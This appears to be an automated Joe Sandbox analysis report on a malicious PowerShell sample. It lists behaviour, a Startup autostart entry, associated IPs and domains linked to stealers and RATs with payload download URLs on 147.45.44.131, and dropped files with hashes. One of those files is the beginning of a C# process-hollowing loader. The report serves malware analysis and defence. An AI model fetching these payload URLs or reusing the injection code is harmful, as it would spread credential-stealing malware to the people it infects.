Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7424 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: wrcaf.ps1

Simulations

Behavior and APIs

Time	Type	Description
13:12:57	API Interceptor	59x Sleep call for process: powershell.exe modified
13:13:10	API Interceptor	7330975x Sleep call for process: RegAsm.exe modified
13:13:27	API Interceptor	1x Sleep call for process: WerFault.exe modified
18:13:01	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
147.45.44.131	2 ps1.ps1	Get hash	malicious	KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131/infopage/ersyb.exe
	vfrcxq.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131/infopage/yijth.exe
	vfdjo.exe	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	147.45.44.131/infopage/yijth.exe
	gqub.bat	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131/infopage/yijth.exe
	trwsfg.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131/infopage/yijth.exe
	iviewers.dll	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/hgfpj.exe
	qoqD1RxV0F.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/inbg.exe
	iviewers.dll	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/inbg.exe
	Captcha.hta	Get hash	malicious	LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer	Browse	147.45.44.131/infopage/bnkh.exe
	htZgRRla8S.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.44.131/infopage/ung0.exe
157.20.182.177	vfrcxq.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse
	vfdjo.exe	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, VenomRAT	Browse
	gqub.bat	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse
	trwsfg.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse
	bKxtUOPLtR.exe	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, VenomRAT	Browse
	https://gogl.to/3HGT	Get hash	malicious	CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	Hornswoggle.exe	Get hash	malicious	GuLoader	Browse	199.232.214.172
	8n26gvrXUM.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://gldkzr-lpqw.buzz/script/ut.js?cb%5C=1735764124690	Get hash	malicious	Unknown	Browse	199.232.210.172
	5fr5gthkjdg71.exe	Get hash	malicious	Quasar, R77 RootKit	Browse	199.232.214.172
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	hcxmivKYfL.exe	Get hash	malicious	RedLine	Browse	199.232.210.172
	WN3Y9XR9c7.exe	Get hash	malicious	AsyncRAT	Browse	199.232.210.172
	test.doc.bin.doc	Get hash	malicious	Unknown	Browse	199.232.214.172
	test.doc.bin.doc	Get hash	malicious	Unknown	Browse	199.232.210.172
	ROtw3Hvdow.exe	Get hash	malicious	Unknown	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FCNUniversityPublicCorporationOsakaJP	ersyb.exe	Get hash	malicious	DcRat, KeyLogger, StormKitty, VenomRAT	Browse	157.20.182.177
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	157.16.83.250
	vfrcxq.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	157.20.182.177
	vfdjo.exe	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	157.20.182.177
	gqub.bat	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	157.20.182.177
	trwsfg.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	157.20.182.177
	bKxtUOPLtR.exe	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	157.20.182.177
	https://gogl.to/3HGT	Get hash	malicious	CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	157.20.182.177
	armv4l.elf	Get hash	malicious	Mirai	Browse	163.227.210.66
	2.elf	Get hash	malicious	Unknown	Browse	157.20.21.157
FREE-NET-ASFREEnetEU	2 ps1.ps1	Get hash	malicious	KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131
	lDO4WBEQyL.exe	Get hash	malicious	GO Backdoor	Browse	147.45.196.157
	vfrcxq.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131
	vfdjo.exe	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	147.45.44.131
	gqub.bat	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131
	trwsfg.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131
	https://gogl.to/3HGT	Get hash	malicious	CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	147.45.44.131
	Loader.exe	Get hash	malicious	Meduza Stealer	Browse	147.45.44.216
	tzA45NGAW4.lnk	Get hash	malicious	Unknown	Browse	147.45.49.155
	soft 1.14.exe	Get hash	malicious	Meduza Stealer	Browse	147.45.44.216

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Temp\Package.exe	2 ps1.ps1	Get hash	malicious	KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse
	script.ps1	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
	script.hta	Get hash	malicious	CredGrabber, Meduza Stealer	Browse
C:\Windows\Temp\iviewers.dll	2 ps1.ps1	Get hash	malicious	KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Package.exe_55a92a429a98c25290d2b6d865f190a11d46a9_8a8df546_ee914679-35a3-4a17-9412-1ed27b8342d9\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9011232441750341
Encrypted:	false
SSDEEP:	192:V2MEHwUdpigh0K5Q+BjC/aQqzuiF8Z24IO80:lEHw2pigiK5Q+BjJzuiF8Y4IO80
MD5:	274F46E42FA317C982508899F6B70894
SHA1:	5E6369B6305E8CC5A0449803A17AE406E396D8E4
SHA-256:	E369E11FA093C6A00E5B6CB5F9203D0D71C6CA52F3F691E9E93D66006AF48A8B
SHA-512:	A8E923DA77042219F40EDBBBAADF246653E1A4A562C722DDD00B8F1526FC46402276C62E26A1CF4AFB2268B376963E6725FF3545462C6B3DCDB062BF53844EFA
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.3.1.5.1.9.1.3.5.2.0.0.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.3.1.5.1.9.2.8.3.6.3.9.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.e.9.1.4.6.7.9.-.3.5.a.3.-.4.a.1.7.-.9.4.1.2.-.1.e.d.2.7.b.8.3.4.2.d.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.8.f.2.0.a.a.b.-.c.4.f.d.-.4.1.e.d.-.b.6.8.5.-.d.5.0.9.d.a.3.7.2.a.8.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.a.c.k.a.g.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.O.L.E.V.I.E.W...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.d.c.-.0.0.0.1.-.0.0.1.4.-.1.e.3.0.-.6.f.f.4.4.1.5.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.2.5.6.b.a.6.7.4.a.c.b.7.8.b.b.9.d.d.5.0.0.d.6.f.4.c.d.0.1.4.b.0.0.0.0.0.9.0.4.!.0.0.0.0.e.4.1.0.6.8.6.1.0.7.6.9.8.1.7.9.9.7.1.9.8.7.6.0.1.9.f.e.5.2.2.4.e.a.c.2.6.5.5.c.!.P.a.c.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A3F.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Jan 2 18:13:12 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	32090
Entropy (8bit):	2.6259182439869964
Encrypted:	false
SSDEEP:	96:518X06/FBzHUfehJvUJJYKfVmtQKFYMhyTgi7C41z65FdumVw8C7wx+Uap7btisT:Qd7Z8JY8wJyMOT2puJQcp7p9GlwaOiB
MD5:	EDE986CBAE3A7D6161FCAD82F58F1274
SHA1:	11086219ABB9BC582988922FEDF758591BF23F52
SHA-256:	ADB9E85BCAE31B3E384A746DA7A514A2D4E2335CD480A4D8EB6319D668630911
SHA-512:	31A8AE6F66B675EE31323BB6ADAF9AD7593C51957274F80A7A27BB6AF0B323ECE3E085F11DAD3FC595B4673F642F37637881FCB30A3D755E015D23D447BE551A
Malicious:	false
Preview:	MDMP..a..... .......8.vg............4...........P...<...........P%..........T.......8...........T................i......................x...............................................................................eJ..............GenuineIntel............T...........+.vg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D3E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.692334682009659
Encrypted:	false
SSDEEP:	192:R6l7wVeJi260hAhk6YooSUU/gmf2ax0pD389bMjsfxEm:R6lXJr60Chk6Y3SU0gmf2axRMIfH
MD5:	92E64E768F565E7425E18BCAEB9E4B75
SHA1:	80FF865227898378CD8CE708F2259BCC791598C5
SHA-256:	F02823D15879095D6FC0875F469038E1315F577F73E007D218ACEE28849CA2FB
SHA-512:	BB08901B0EAB1CED5F4FCB732F7735B6125E75234D7DCF61C301DBC96582FE8AB7EC83ABA56FE37F66EEF2F41C784D3BA99A20E2C7F25A9CE4079197336A518B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.4.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5DCB.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4741
Entropy (8bit):	4.465629724249008
Encrypted:	false
SSDEEP:	48:cvIwWl8zsRJg77aI9wbWpW8VYBbYm8M4JwerFhFR+q8vqFT1sfQyJMd:uIjfjI7Sq7V4+Jw6KYsfhJMd
MD5:	A35E5E7F2AC028D0F5028032CFFBFFF3
SHA1:	1B8A51D16F685A07DA2B3F454FA9338877404BC2
SHA-256:	EE4C3133E7606C8D955E9D5F47FA2EE4F6269FA68F8059190A4D9FF806D52672
SHA-512:	34FF1D684877F14CAE06762CB06A79E696CC1B009C34E4388A34CF26775928E631BA39CCB35D4ABA632D11BD0ACF91D867A0F9BC582062571A6397A636C16CA6
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="658635" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.2478978672539016
Encrypted:	false
SSDEEP:	6:kKG4n9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:upDImsLNkPlE99SNxAhUe/3
MD5:	8E06FE5BBF0D0BCFA5425810A97E2DC5
SHA1:	F128E1071CB9CC2A463312732D80285A54B62BFB
SHA-256:	1C57D8D06CEFD1FD6B8ECD6F28FA1B8F66CA7481C8816BC419F2E38A71CE11CA
SHA-512:	C5C68E899E5E3FC7806B986615CA3602EF7F6C013AB5D57E8786D0A92917E74D5B571A4956C459804ACF5AB0378CFCF6568012A547C05329183C61B98333A273
Malicious:	false
Preview:	p...... .........8..A]..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\RES3794.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Jan 2 19:23:35 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.9743206769486696
Encrypted:	false
SSDEEP:	24:HLe9EuZfDU/XDfHGwKEbsmfII+ycuZhNbQWakSYQHPNnqSqd:CBDU/zFKPmg1ulra3HqSK
MD5:	A0154243FCDD17CAAE4CAB629CA3BE33
SHA1:	90524C345F79423B57C807FD01482A0A4BECB963
SHA-256:	077A77F361969C988E8414A179EC02014AA98C8A23B0F9924045BD3154FD940D
SHA-512:	70D11C34AE8AEB6B44AEAAA535AC578C34D3824EFAFCD6064EC1579CB8D9F59576AA1890A4521897B186AA72242255643951723D1AD1CC08D23CEA445FC88587
Malicious:	false
Preview:	L.....vg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\envi5f4j\CSC9C647CAA9F2542549472B496F61651E.TMP................&.u..L.3.3_.Cb............4.......C:\Users\user\AppData\Local\Temp\RES3794.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.n.v.i.5.f.4.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fcc4yn4a.w3m.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gn3u3icz.d14.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igscqeq3.q05.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kkfzyhne.e2f.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\envi5f4j\CSC9C647CAA9F2542549472B496F61651E.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0977603218976797
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryEGQWak7YnqqVGQHPN5Dlq5J:+RI+ycuZhNbQWakSYQHPNnqX
MD5:	26DD75AB144C0D33D0335FDB4362130A
SHA1:	A3431EC15058958B103CB0982502E809C671EA78
SHA-256:	28D1C0E78A160F3516701AC158CD1403A7421146186E003931E334DE0BA60F21
SHA-512:	AF8749A2F74C2ABDCE88E353012ACFD4F36812A843DFC1903F2A54E5509654017E0C82AF201DAF2CA29FB91A760750CD1EDA1E0D150E3DF72A0DDE8E1605B414
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.n.v.i.5.f.4.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.n.v.i.5.f.4.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	11063
Entropy (8bit):	4.54611001642782
Encrypted:	false
SSDEEP:	192:2QC2o4mAQgOLocU9wMk2kAt/Z7pu/cuvnzHzrEo6uT:2oYLoH97t/Z7pgjvzf5DT
MD5:	3FA79DECFF8805745CEA8116D9BB2643
SHA1:	92343C5FA2C768B964AE3A4E9136E5D7193E8558
SHA-256:	E6852A401B53A7AF04D57AA1E4FC9621E3DFFC1221534142316A27AE67E8F89C
SHA-512:	5C2879E59FA6609E6E87F70C5237B250A906BF7DD13A343DAC9E81635B1FC91AD9374E643A306B99503C52CE9BD56554A64AA132584C732D43EE39FB17305D78
Malicious:	true
Preview:	.using System;..using System.Diagnostics;..using System.IO;..using System.Net;..using System.Runtime.InteropServices;..using System.Threading.Tasks;....public class ClasserPlus..{.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.... public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
